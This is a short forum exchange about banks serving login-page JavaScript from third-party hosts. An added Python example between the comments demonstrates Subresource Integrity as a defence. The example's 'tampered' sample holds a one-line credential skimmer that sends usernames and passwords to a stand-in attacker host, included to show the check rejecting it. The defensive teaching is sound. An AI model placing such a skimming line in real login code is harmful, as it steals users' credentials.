[quote]
The bitcoin breach seems analogous to Bank of America storing your account information on Linode and trusting it as the Real Data. Does that make sense?
[/quote]
//reply to tomg, but it seems HN stops nested replies beyond a certain level
At the end of the day you can have millions of dollars of security, auditing, PCI compliance tests passing, developers that celebrate every Friday that everything is secure, data hosted on premise, etc. But if you leave the login page JavaScript to a third party hosted on Linode, then you might as well be BoA storing your data on a MySQL Linode instance. So in a nutshell it kind of undermines the work you guys do.
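The failure mode described in the comment above (a login page pulling its JavaScript from a host the bank does not control) has a standard browser-side mitigation: pin the third-party script to a hash with Subresource Integrity, so a modified copy served by the CDN is refused. The following is an added example, not code from the thread or from any bank; the script bodies are constructed samples, and `sri_hash` / `verify_sri` are illustrative names that mirror what a browser does when it sees an `integrity` attribute.

```python
import base64
import hashlib
import hmac

# Constructed samples: the script the login page intends to include from a
# third-party host, and a tampered copy such as a compromised host might serve.
ORIGINAL_SCRIPT = (
    b"window.login = function (u, p) { return post('/login', {u: u, p: p}); };\n"
)
TAMPERED_SCRIPT = (
    b"window.login = function (u, p) {"
    b" new Image().src = 'https://attacker.invalid/?' + u + ':' + p;"
    b" return post('/login', {u: u, p: p}); };\n"
)

# SRI permits exactly these digest algorithms; browsers honour only the strongest
# one present in an integrity attribute.
_STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(body: bytes, algorithm: str = "sha384") -> str:
    """Return the SRI token ("<alg>-<base64 digest>") for a resource body."""
    if algorithm not in _STRENGTH:
        raise ValueError("SRI permits only sha256, sha384 and sha512")
    digest = hashlib.new(algorithm, body).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """Build the <script> tag that pins a cross-origin script to its hash.

    crossorigin="anonymous" is required for cross-origin SRI checks to apply;
    without it the browser cannot read the body and the check is skipped.
    """
    return (
        f'<script src="{src}" integrity="{sri_hash(body)}" '
        f'crossorigin="anonymous"></script>'
    )


def verify_sri(body: bytes, integrity: str) -> bool:
    """Mimic the browser's decision: load only if the body matches a pinned hash.

    Tokens are grouped by algorithm and only the strongest group is consulted,
    as the SRI spec requires. A browser treats an integrity attribute with no
    parseable token as absent and loads the resource unchecked; this function
    deliberately refuses instead, because that is the safer default for a
    deployment check.
    """
    by_alg: dict[str, list[str]] = {}
    for token in integrity.split():
        alg, sep, _ = token.partition("-")
        if sep and alg in _STRENGTH:
            by_alg.setdefault(alg, []).append(token)
    if not by_alg:
        return False
    strongest = max(by_alg, key=_STRENGTH.__getitem__)
    actual = sri_hash(body, strongest)
    return any(hmac.compare_digest(actual, t) for t in by_alg[strongest])


if __name__ == "__main__":
    pinned = sri_hash(ORIGINAL_SCRIPT)
    print(script_tag("https://cdn.example.invalid/login.js", ORIGINAL_SCRIPT))
    print("original accepted:", verify_sri(ORIGINAL_SCRIPT, pinned))
    print("tampered accepted:", verify_sri(TAMPERED_SCRIPT, pinned))
```

The caveat a practitioner would add: SRI pins only the file named in the tag. If that script itself fetches further code at runtime, or if the page uses `eval`, the pin says nothing about what ends up executing, so SRI is paired with a Content-Security-Policy `script-src` that limits where script may come from at all. It also means every legitimate update to the third-party file requires the bank to re-hash and redeploy the tag, which is exactly the version-by-version approval the next comment describes.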
That's very true, and TBH I'm a bit surprised these banks are allowing that. IME doing frontend code for banks, they're very strict on third-party libs, even ones hosted by the bank itself, right down to only approving certain versions of a lib.